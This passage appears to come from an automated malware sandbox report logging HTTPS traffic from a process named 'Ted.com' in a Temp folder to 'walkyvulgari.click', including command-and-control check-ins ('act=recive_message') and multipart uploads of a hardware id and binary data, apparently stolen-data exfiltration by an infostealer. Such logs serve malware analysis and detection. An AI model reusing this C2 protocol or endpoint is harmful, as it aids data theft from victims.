                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1572&min_rtt=1562&rtt_var=606&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1777236&cwnd=205&unsent_bytes=0&cid=50091686a479b535&ts=3865&x=0"
                                                                                                                                      2024-12-27 09:21:29 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                      Data Ascii: 2ok
                                                                                                                                      2024-12-27 09:21:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      1192.168.2.449737104.21.94.924434348C:\Users\user\AppData\Local\Temp\723356\Ted.com
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-27 09:21:30 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 76
                                                                                                                                      Host: walkyvulgari.click
                                                                                                                                      2024-12-27 09:21:30 UTC76OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 6c 31 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61
                                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=jMw1IE--l1&j=aa77e78b6b0dd1b2226e7b799532ab3a
                                                                                                                                      2024-12-27 09:21:33 UTC1132INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 27 Dec 2024 09:21:33 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=h8544jc637dtet6kkv59l71q7b; expires=Tue, 22 Apr 2025 03:08:12 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      vary: accept-encoding
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HBQctfCMzNoA8BA29q%2Blf6yfPuvv%2BQnarhzKfxgjbw12u0Bk4toS8YqWjeash3sv%2B2E3ZT24ckr1B6Se5aL55%2FGCmmcjucN4kNGneVI3MO2MpUqoRfV4hzS1uHexXTAUF9Zea%2FE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8f883da888a4de95-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1496&min_rtt=1490&rtt_var=571&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=978&delivery_rate=1894873&cwnd=240&unsent_bytes=0&cid=e29928c81319f358&ts=2850&x=0"
                                                                                                                                      2024-12-27 09:21:33 UTC237INData Raw: 34 65 61 30 0d 0a 31 75 6b 6a 73 44 67 6e 6b 50 44 67 6d 79 64 64 69 2f 4e 45 67 59 68 4d 79 4a 64 76 57 6d 35 4a 78 6c 63 47 36 4c 74 5a 74 4c 43 74 79 31 57 53 41 68 4f 38 30 70 50 2b 42 57 66 74 6b 69 6a 79 37 57 44 71 39 67 74 34 56 43 2b 6e 4f 33 57 4e 6c 33 76 43 33 66 54 54 52 64 46 55 56 50 58 63 77 76 35 66 66 37 47 6f 50 36 50 74 49 75 71 74 54 54 38 45 4b 36 63 37 5a 49 6e 51 4e 73 54 63 74 59 46 50 31 31 42 43 38 35 53 42 39 30 6f 34 37 70 59 6c 36 2b 59 6c 70 66 38 43 65 45 4a 72 6f 79 30 6b 30 70 6b 55 30 63 53 33 70 45 4c 44 55 77 58 74 33 4a 75 35 51 6a 4f 70 79 57 62 67 37 53 36 6b 38 51 73 78 42 69 47 75 4d 32 57 4d 30 53 6e 64 31 72 36 42 51 64 52 52 53 50 71 41 6a 50 31 4e 4d 2b 69
                                                                                                                                      Data Ascii: 4ea01ukjsDgnkPDgmyddi/NEgYhMyJdvWm5JxlcG6LtZtLCty1WSAhO80pP+BWftkijy7WDq9gt4VC+nO3WNl3vC3fTTRdFUVPXcwv5ff7GoP6PtIuqtTT8EK6c7ZInQNsTctYFP11BC85SB90o47pYl6+Ylpf8CeEJroy0k0pkU0cS3pELDUwXt3Ju5QjOpyWbg7S6k8QsxBiGuM2WM0Snd1r6BQdRRSPqAjP1NM+i
                                                                                                                                      2024-12-27 09:21:33 UTC1369INData Raw: 63 4a 61 4f 6b 62 71 33 74 54 57 42 4d 65 4a 59 32 64 5a 76 4d 4e 73 62 55 39 4a 51 50 79 78 70 43 2f 74 4c 61 75 55 30 7a 35 35 51 6c 37 4f 30 76 71 75 63 43 4f 41 38 6a 72 44 46 75 68 64 59 30 32 4e 69 7a 67 30 6a 56 56 55 4c 36 6c 49 33 36 42 58 47 70 6c 6a 36 6a 73 6d 36 4b 35 51 34 37 47 43 61 31 64 58 76 45 77 48 76 52 33 76 54 54 41 64 52 55 52 50 2b 53 6b 50 46 4f 4e 4f 79 44 4c 65 72 6e 49 36 72 34 42 7a 63 50 4b 36 4d 2f 62 6f 58 54 50 39 76 66 73 6f 74 42 6b 68 51 46 39 59 72 43 6f 51 55 63 37 49 45 68 37 2f 78 73 6b 4c 55 53 64 68 56 72 6f 7a 6b 6b 30 70 6b 7a 30 39 47 33 67 45 37 52 55 6b 37 67 6b 70 44 2f 53 44 72 37 6c 79 50 74 34 43 32 34 2f 77 4d 2b 44 79 4b 76 50 47 47 4e 33 58 75 59 6b 72 4f 54 41 59 6f 61 5a 50 2b 5a 6a 76 4e 53 50 36
                                                                                                                                      Data Ascii: cJaOkbq3tTWBMeJY2dZvMNsbU9JQPyxpC/tLauU0z55Ql7O0vqucCOA8jrDFuhdY02Nizg0jVVUL6lI36BXGplj6jsm6K5Q47GCa1dXvEwHvR3vTTAdRURP+SkPFONOyDLernI6r4BzcPK6M/boXTP9vfsotBkhQF9YrCoQUc7IEh7/xskLUSdhVrozkk0pkz09G3gE7RUk7gkpD/SDr7lyPt4C24/wM+DyKvPGGN3XuYkrOTAYoaZP+ZjvNSP6
                                                                                                                                      2024-12-27 09:21:33 UTC1369INData Raw: 36 69 4b 34 2b 51 63 2b 41 79 61 6f 64 53 72 4b 33 69 4f 57 69 76 53 68 51 73 5a 5a 54 37 43 6e 67 66 64 4c 4f 50 2f 52 4f 61 33 7a 62 71 33 35 54 57 42 4d 4a 71 55 39 59 70 6a 57 4e 74 58 63 75 6f 52 45 33 56 4a 46 38 70 2b 48 2f 55 34 30 36 70 77 69 38 65 41 75 6f 76 41 4d 4d 67 5a 72 36 6e 56 6a 6b 70 6c 6a 6c 75 4f 6a 67 41 50 6e 57 55 76 38 6c 5a 53 35 57 6e 48 77 30 53 48 76 71 6e 62 71 2b 41 55 39 43 53 53 6c 50 32 71 50 30 7a 66 65 33 4c 65 5a 54 74 5a 61 53 66 71 59 6a 2f 64 42 4e 2b 43 61 4c 65 58 71 4c 36 43 31 51 33 67 4c 4d 2b 52 74 4a 4c 37 65 4e 39 76 64 39 72 35 43 33 46 52 43 35 4e 4b 64 74 31 78 2f 37 70 31 6d 75 36 6f 69 6f 2f 55 47 4d 67 67 72 6f 7a 68 68 69 64 34 34 32 39 57 2b 68 55 62 57 56 6b 7a 2f 6c 49 4c 2b 51 54 72 37 6c 43 2f
                                                                                                                                      Data Ascii: 6iK4+Qc+AyaodSrK3iOWivShQsZZT7CngfdLOP/ROa3zbq35TWBMJqU9YpjWNtXcuoRE3VJF8p+H/U406pwi8eAuovAMMgZr6nVjkpljluOjgAPnWUv8lZS5WnHw0SHvqnbq+AU9CSSlP2qP0zfe3LeZTtZaSfqYj/dBN+CaLeXqL6C1Q3gLM+RtJL7eN9vd9r5C3FRC5NKdt1x/7p1mu6oio/UGMggrozhhid4429W+hUbWVkz/lIL+QTr7lC/
                                                                                                                                      2024-12-27 09:21:33 UTC1369INData Raw: 2f 73 62 65 42 4e 6c 76 58 56 6a 68 70 6c 6a 6c 74 75 39 6d 55 2f 63 55 30 6a 30 6d 6f 58 33 53 44 54 76 6d 69 48 6b 37 43 4f 69 2b 41 67 37 44 53 2b 75 4a 32 65 42 30 7a 62 63 6b 76 72 4c 52 73 6f 61 48 62 4b 31 6a 74 42 56 4a 50 75 48 5a 76 79 6b 4e 2b 72 79 41 58 68 55 61 36 63 36 62 59 58 52 4d 39 6e 64 73 49 56 48 31 46 64 41 2f 5a 69 51 38 55 73 79 34 70 34 74 38 65 6f 6a 72 76 6b 4a 4d 41 63 68 35 48 73 6b 6a 63 46 37 6a 70 4b 42 68 6b 37 53 57 56 4f 79 6a 63 7a 67 42 54 6a 6c 30 58 36 6a 35 69 43 71 2b 67 45 30 42 79 4f 6c 4f 57 71 4e 33 44 4c 65 32 71 61 4b 52 64 70 62 53 2f 32 54 68 76 78 41 4f 2b 36 56 49 4f 79 71 59 4f 72 79 46 58 68 55 61 34 73 53 55 63 6a 34 41 5a 62 4e 2b 70 49 42 31 56 59 46 71 74 4b 4f 2b 6b 6b 33 35 70 63 76 37 2b 41 6e
                                                                                                                                      Data Ascii: /sbeBNlvXVjhpljltu9mU/cU0j0moX3SDTvmiHk7COi+Ag7DS+uJ2eB0zbckvrLRsoaHbK1jtBVJPuHZvykN+ryAXhUa6c6bYXRM9ndsIVH1FdA/ZiQ8Usy4p4t8eojrvkJMAch5HskjcF7jpKBhk7SWVOyjczgBTjl0X6j5iCq+gE0ByOlOWqN3DLe2qaKRdpbS/2ThvxAO+6VIOyqYOryFXhUa4sSUcj4AZbN+pIB1VYFqtKO+kk35pcv7+An
                                                                                                                                      2024-12-27 09:21:33 UTC1369INData Raw: 4d 49 4b 4b 41 77 61 34 76 59 50 63 54 56 76 5a 6c 50 33 31 56 4e 2b 70 75 44 2f 55 41 79 37 35 30 73 34 75 30 67 70 50 31 4e 64 6b 77 73 76 48 55 38 79 76 67 72 7a 63 43 69 68 6d 44 66 56 51 58 74 33 4a 75 35 51 6a 4f 70 79 57 62 71 2b 43 71 6e 35 77 51 2f 41 69 53 6e 4a 32 57 48 30 69 6e 52 33 62 43 4d 54 64 52 56 51 2f 4f 58 69 50 56 43 4f 75 4b 65 4b 71 4f 6b 62 71 33 74 54 57 42 4d 42 61 38 6d 63 34 6e 58 4d 4d 44 4a 39 4a 51 50 79 78 70 43 2f 74 4c 61 75 55 59 30 34 70 55 6d 37 2b 6f 71 70 2f 55 66 4e 77 73 73 72 54 35 32 67 4e 34 38 33 64 71 2f 68 45 66 41 56 6b 76 67 6c 35 44 72 42 58 47 70 6c 6a 36 6a 73 6d 36 63 38 68 30 6f 44 32 6d 56 49 32 65 63 30 6a 62 61 6b 71 76 46 57 4a 4a 64 53 62 4c 4b 77 76 39 4b 4e 75 71 65 4a 2b 72 6d 49 36 2f 38 43
                                                                                                                                      Data Ascii: MIKKAwa4vYPcTVvZlP31VN+puD/UAy750s4u0gpP1NdkwsvHU8yvgrzcCihmDfVQXt3Ju5QjOpyWbq+Cqn5wQ/AiSnJ2WH0inR3bCMTdRVQ/OXiPVCOuKeKqOkbq3tTWBMBa8mc4nXMMDJ9JQPyxpC/tLauUY04pUm7+oqp/UfNwssrT52gN483dq/hEfAVkvgl5DrBXGplj6jsm6c8h0oD2mVI2ec0jbakqvFWJJdSbLKwv9KNuqeJ+rmI6/8C
                                                                                                                                      2024-12-27 09:21:33 UTC1369INData Raw: 76 4f 31 61 4a 77 6e 76 4a 6e 4b 33 4c 52 74 34 61 48 62 4b 52 68 66 70 45 4e 65 43 64 4b 65 54 75 50 4b 44 79 48 7a 6b 4e 49 4b 6b 35 5a 49 66 55 4d 64 66 62 75 59 64 4d 31 56 31 4b 39 39 4c 4d 75 55 49 6e 71 63 6c 6d 77 75 63 6c 70 71 35 58 65 42 4e 6c 76 58 56 6a 68 70 6c 6a 6c 74 4b 2b 6a 6b 76 66 57 55 72 78 67 49 50 2f 56 7a 2f 6b 6d 7a 54 70 34 53 75 6e 2b 41 41 37 43 69 32 76 4f 58 61 44 32 54 6a 64 6b 76 72 4c 52 73 6f 61 48 62 4b 78 6c 65 39 50 4f 4f 57 48 4c 65 4c 70 4f 4b 66 6c 54 58 5a 4d 4f 71 4d 6b 4a 4e 4c 50 4b 38 48 56 71 38 56 59 6b 6c 31 4a 73 73 72 43 2f 30 77 35 37 70 63 6f 38 65 38 6f 70 66 6f 45 4d 51 67 6a 70 7a 56 67 6a 74 34 2b 31 64 36 2f 6a 45 4c 64 58 6b 7a 38 6d 34 32 35 43 33 2f 75 69 57 61 37 71 67 2b 78 39 67 45 31 54 44
                                                                                                                                      Data Ascii: vO1aJwnvJnK3LRt4aHbKRhfpENeCdKeTuPKDyHzkNIKk5ZIfUMdfbuYdM1V1K99LMuUInqclmwuclpq5XeBNlvXVjhpljltK+jkvfWUrxgIP/Vz/kmzTp4Sun+AA7Ci2vOXaD2TjdkvrLRsoaHbKxle9POOWHLeLpOKflTXZMOqMkJNLPK8HVq8VYkl1JssrC/0w57pco8e8opfoEMQgjpzVgjt4+1d6/jELdXkz8m425C3/uiWa7qg+x9gE1TD
                                                                                                                                      2024-12-27 09:21:33 UTC1369INData Raw: 79 70 64 37 30 63 72 30 30 77 48 79 55 56 50 33 6c 5a 53 37 63 44 7a 6e 6e 79 48 31 71 6a 47 56 75 30 30 35 54 48 4f 64 4c 43 53 63 6d 57 4f 45 6e 50 53 5a 41 59 6f 61 41 76 47 41 6b 50 39 47 4b 65 72 57 47 4e 33 4e 4f 4b 44 79 48 54 38 62 4a 4f 52 37 4a 49 57 5a 59 2b 2b 53 76 59 78 61 77 30 78 49 34 70 58 43 78 67 74 2f 38 64 46 2b 6f 39 38 74 70 50 73 4b 4c 68 31 6d 67 79 4e 75 6a 63 6b 38 77 64 33 30 78 51 48 55 47 68 32 68 33 4d 4c 39 56 48 2b 78 77 58 53 34 76 33 33 39 70 56 38 6e 51 6a 4c 6b 49 79 54 53 69 33 57 57 77 50 54 54 41 5a 56 5a 56 2b 43 55 67 65 39 47 65 4e 65 76 41 66 6e 6e 4b 4c 33 6b 4d 77 59 4c 4d 61 6b 7a 63 35 75 56 4c 74 58 63 75 6f 78 58 6b 68 51 46 2f 64 4c 61 77 41 56 33 71 61 35 6f 6f 2f 4a 75 38 72 55 34 4f 77 49 6c 6f 79 4e
                                                                                                                                      Data Ascii: ypd70cr00wHyUVP3lZS7cDznnyH1qjGVu005THOdLCScmWOEnPSZAYoaAvGAkP9GKerWGN3NOKDyHT8bJOR7JIWZY++SvYxaw0xI4pXCxgt/8dF+o98tpPsKLh1mgyNujck8wd30xQHUGh2h3ML9VH+xwXS4v339pV8nQjLkIyTSi3WWwPTTAZVZV+CUge9GeNevAfnnKL3kMwYLMakzc5uVLtXcuoxXkhQF/dLawAV3qa5oo/Ju8rU4OwIloyN
                                                                                                                                      2024-12-27 09:21:33 UTC1369INData Raw: 34 36 41 2b 73 74 54 6b 67 49 46 74 5a 47 51 36 30 4d 38 2f 35 4a 68 33 64 51 4a 70 50 49 4d 4c 68 77 38 71 77 74 61 6e 39 6f 31 32 4e 57 69 6d 67 47 63 47 6b 71 79 79 72 75 35 44 58 2f 57 33 32 62 37 71 6e 62 71 77 41 34 32 41 69 79 79 4a 43 6d 74 31 7a 7a 58 78 4b 53 63 54 70 49 55 42 66 54 53 32 71 73 4c 66 2b 32 41 5a 72 75 36 66 50 47 67 58 6d 39 63 65 62 74 37 66 63 72 50 65 34 36 41 2b 73 74 54 6b 67 49 46 74 5a 47 51 36 30 4d 38 2f 35 4a 68 33 64 51 4a 70 50 49 4d 4c 68 77 38 71 33 70 4b 76 50 67 46 36 4d 65 33 68 55 2f 56 54 46 53 79 33 4d 4c 32 42 57 66 51 30 57 36 6a 31 57 44 71 37 55 31 67 54 42 36 6e 4f 32 71 4e 7a 79 71 62 39 62 71 4d 51 4d 52 4b 55 76 33 64 72 4d 39 6b 66 36 66 52 49 4b 4f 79 66 4f 53 31 43 53 6c 4d 63 2f 52 6e 50 39 2b 4b
                                                                                                                                      Data Ascii: 46A+stTkgIFtZGQ60M8/5Jh3dQJpPIMLhw8qwtan9o12NWimgGcGkqyyru5DX/W32b7qnbqwA42AiyyJCmt1zzXxKScTpIUBfTS2qsLf+2AZru6fPGgXm9cebt7fcrPe46A+stTkgIFtZGQ60M8/5Jh3dQJpPIMLhw8q3pKvPgF6Me3hU/VTFSy3ML2BWfQ0W6j1WDq7U1gTB6nO2qNzyqb9bqMQMRKUv3drM9kf6fRIKOyfOS1CSlMc/RnP9+K
                                                                                                                                      2024-12-27 09:21:33 UTC1369INData Raw: 50 4c 44 35 4a 43 42 61 72 53 72 2b 74 43 4c 2b 72 52 61 4b 50 6d 62 76 4b 31 41 43 6f 4c 4f 36 64 35 59 35 44 65 65 38 6d 63 72 63 74 58 6b 67 49 57 76 4e 4b 51 75 52 31 2f 72 70 38 72 34 75 6b 67 71 65 63 66 50 67 38 39 70 33 4a 61 74 50 51 70 30 63 4b 33 79 58 44 66 58 6c 50 6e 6b 5a 4c 2b 65 77 48 45 67 79 48 7a 36 57 79 47 38 67 41 30 4d 68 57 54 4a 47 4f 61 6d 78 33 56 78 4c 66 4c 44 35 4a 43 42 61 72 53 72 2b 74 43 4c 2b 72 54 43 75 54 6e 49 75 72 71 51 79 46 4d 50 65 52 74 4e 38 53 5a 4b 5a 61 4b 39 4d 78 43 77 45 68 44 38 59 53 42 76 6e 73 42 78 49 4d 68 38 2b 6c 73 6d 2f 67 4a 4c 68 6b 6f 74 44 4a 61 74 50 51 70 30 63 4b 33 79 57 54 6f 47 48 54 6b 6b 59 4c 33 51 6e 2b 6e 30 54 36 6a 73 6d 36 48 35 77 6f 6f 44 32 6d 42 44 79 61 37 7a 7a 6a 57 33
                                                                                                                                      Data Ascii: PLD5JCBarSr+tCL+rRaKPmbvK1ACoLO6d5Y5Dee8mcrctXkgIWvNKQuR1/rp8r4ukgqecfPg89p3JatPQp0cK3yXDfXlPnkZL+ewHEgyHz6WyG8gA0MhWTJGOamx3VxLfLD5JCBarSr+tCL+rTCuTnIurqQyFMPeRtN8SZKZaK9MxCwEhD8YSBvnsBxIMh8+lsm/gJLhkotDJatPQp0cK3yWToGHTkkYL3Qn+n0T6jsm6H5wooD2mBDya7zzjW3


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      2192.168.2.449738104.21.94.924434348C:\Users\user\AppData\Local\Temp\723356\Ted.com
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-27 09:21:35 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=WIIPNN3BBV
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 18112
                                                                                                                                      Host: walkyvulgari.click
                                                                                                                                      2024-12-27 09:21:35 UTC15331OUTData Raw: 2d 2d 57 49 49 50 4e 4e 33 42 42 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 33 30 45 31 33 31 39 42 45 32 35 45 30 44 34 34 45 43 30 45 39 37 39 46 31 31 37 36 39 42 35 0d 0a 2d 2d 57 49 49 50 4e 4e 33 42 42 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 49 49 50 4e 4e 33 42 42 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 6c 31 0d 0a 2d 2d 57 49 49 50 4e 4e 33 42 42 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73
                                                                                                                                      Data Ascii: --WIIPNN3BBVContent-Disposition: form-data; name="hwid"F30E1319BE25E0D44EC0E979F11769B5--WIIPNN3BBVContent-Disposition: form-data; name="pid"2--WIIPNN3BBVContent-Disposition: form-data; name="lid"jMw1IE--l1--WIIPNN3BBVContent-Dis
                                                                                                                                      2024-12-27 09:21:35 UTC2781OUTData Raw: a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b
                                                                                                                                      Data Ascii: \f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5
                                                                                                                                      2024-12-27 09:21:36 UTC1135INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 27 Dec 2024 09:21:35 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=arpejlhh3blmu9k92mnss55t4p; expires=Tue, 22 Apr 2025 03:08:14 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      vary: accept-encoding
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B9hzEiwVQ4C9N5z78eyIV0XUorDbFIICgsBSEOork0MNfDeI2ThMpHztttyUEfj%2BJHPjnOMKtltjTPW03kWJKkbpK%2FrbYj%2Fv4UPT7rBvV876J%2BWJqWurJqH7x01QcEQWT%2FUHZtA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8f883dc2ff5943cb-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1674&min_rtt=1668&rtt_var=637&sent=13&recv=24&lost=0&retrans=0&sent_bytes=2846&recv_bytes=19068&delivery_rate=1701631&cwnd=198&unsent_bytes=0&cid=a3b9cd78d1891ecb&ts=988&x=0"
                                                                                                                                      2024-12-27 09:21:36 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                      2024-12-27 09:21:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      3192.168.2.449739104.21.94.924434348C:\Users\user\AppData\Local\Temp\723356\Ted.com
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-27 09:21:37 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=88R3F3YB
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 8721
                                                                                                                                      Host: walkyvulgari.click
                                                                                                                                      2024-12-27 09:21:37 UTC8721OUTData Raw: 2d 2d 38 38 52 33 46 33 59 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 33 30 45 31 33 31 39 42 45 32 35 45 30 44 34 34 45 43 30 45 39 37 39 46 31 31 37 36 39 42 35 0d 0a 2d 2d 38 38 52 33 46 33 59 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 38 52 33 46 33 59 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 6c 31 0d 0a 2d 2d 38 38 52 33 46 33 59 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e
                                                                                                                                      Data Ascii: --88R3F3YBContent-Disposition: form-data; name="hwid"F30E1319BE25E0D44EC0E979F11769B5--88R3F3YBContent-Disposition: form-data; name="pid"2--88R3F3YBContent-Disposition: form-data; name="lid"jMw1IE--l1--88R3F3YBContent-Disposition
                                                                                                                                      2024-12-27 09:21:38 UTC1133INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 27 Dec 2024 09:21:38 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=tlleon6pr0mutll0h2j87ejaa5; expires=Tue, 22 Apr 2025 03:08:16 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      vary: accept-encoding
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KVp36cDUJRwXyAh3Yk6jSxNerl9QpIbzUA9q%2FMeaFJicd8A5PMXztGlK5Y%2FlFf4Rnw4ZbZTqm6XKe%2FZIDlepP%2FZBr80coyVbsf8HB9eR5eQeS8%2F08ksQNDnWJtep1eBkAEbDXPI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8f883dd11c3c8c41-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1938&min_rtt=1930&rtt_var=739&sent=8&recv=15&lost=0&retrans=0&sent_bytes=2846&recv_bytes=9652&delivery_rate=1464393&cwnd=225&unsent_bytes=0&cid=10fbeb600c2b2af6&ts=894&x=0"
                                                                                                                                      2024-12-27 09:21:38 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                      2024-12-27 09:21:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      4192.168.2.449740104.21.94.924434348C:\Users\user\AppData\Local\Temp\723356\Ted.com
                                                                                                                                      TimestampBytes transferredDirectionData
